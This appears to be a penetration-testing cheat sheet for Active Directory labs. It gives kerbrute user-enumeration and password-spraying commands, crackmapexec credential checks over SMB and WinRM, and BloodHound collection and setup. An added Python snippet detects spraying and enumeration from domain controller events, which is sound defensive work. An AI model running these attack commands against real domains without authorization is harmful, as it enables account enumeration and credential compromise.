Enumeration


bloodhound-python -u username -p password -d htb.local -ns $IP

Grabbing the hostname

crackmapexec smb $IP

You found users but want to confirm they are valid 👍

Link: https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
./kerbrute_linux_amd64 userenum --dc $IP -d <domain> users.txt

You have a password but don't know which user it belongs to 👍

./kerbrute_linux_amd64 passwordspray --dc $IP -d <domain> users.txt 'Iampassword?'
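
From the defending side, both kerbrute modes above show up in the domain controller's Security log when Kerberos authentication auditing is enabled: requests for unknown accounts as event 4768 with result code 0x6, wrong passwords as event 4771 with failure code 0x18. The check below is an added example, not part of the original notes; the record field names (ts, src, user, code), the thresholds and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict

# Kerberos result codes recorded in Windows Security events on the domain controller
CHECKS = {
    (4768, "0x6"): "user-enumeration",   # TGT request for a non-existent principal
    (4771, "0x18"): "password-spray",    # pre-authentication failed (wrong password)
}

# Constructed sample events (illustrative, reduced to the fields the check needs)
EVENTS = [
    {"ts": 100, "id": 4768, "src": "10.10.14.5", "user": "alice", "code": "0x6"},
    {"ts": 101, "id": 4768, "src": "10.10.14.5", "user": "bob", "code": "0x6"},
    {"ts": 101, "id": 4768, "src": "10.10.14.5", "user": "carol", "code": "0x6"},
    {"ts": 102, "id": 4768, "src": "10.10.14.5", "user": "dave", "code": "0x6"},
    {"ts": 130, "id": 4771, "src": "10.10.14.5", "user": "svc-a", "code": "0x18"},
    {"ts": 130, "id": 4771, "src": "10.10.14.5", "user": "svc-b", "code": "0x18"},
    {"ts": 131, "id": 4771, "src": "10.10.14.5", "user": "svc-c", "code": "0x18"},
    # One user mistyping a password three times: many failures, one account
    {"ts": 140, "id": 4771, "src": "10.10.10.20", "user": "erin", "code": "0x18"},
    {"ts": 150, "id": 4771, "src": "10.10.10.20", "user": "erin", "code": "0x18"},
    {"ts": 155, "id": 4771, "src": "10.10.10.20", "user": "Erin", "code": "0x18"},
]


def flag_sources(events, min_users=3, window=60):
    """Map source IP -> sorted findings where one source fails against
    at least min_users distinct accounts inside one fixed time window."""
    seen = defaultdict(set)  # (src, finding, window bucket) -> distinct accounts
    for e in events:
        finding = CHECKS.get((e["id"], e["code"].lower()))
        if finding:
            seen[(e["src"], finding, e["ts"] // window)].add(e["user"].lower())
    flagged = defaultdict(set)
    for (src, finding, _bucket), users in seen.items():
        if len(users) >= min_users:
            flagged[src].add(finding)
    return {src: sorted(f) for src, f in flagged.items()}


if __name__ == "__main__":
    for src, findings in flag_sources(EVENTS).items():
        print(src, ", ".join(findings))
```

Counting distinct accounts per source, rather than raw failures, is what separates a spray or enumeration run from a single user repeatedly mistyping a password.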

Test whether the user you found can log in

crackmapexec smb $IP -u username -p 'password'

crackmapexec winrm $IP -u username -p 'password'

crackmapexec winrm $IP -d domain -u username -p 'password'

Bloodhound

Link: https://github.com/fox-it/BloodHound.py
python3 bloodhound.py -u username -p 'password' -d <domain> -ns $IP -c All
The above command generates JSON files that can be imported into BloodHound.

sudo neo4j console

wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.1.0/BloodHound-linux-x64.zip
unzip BloodHound-linux-x64.zip
cd BloodHound-linux-x64
chmod +x BloodHound
./BloodHound
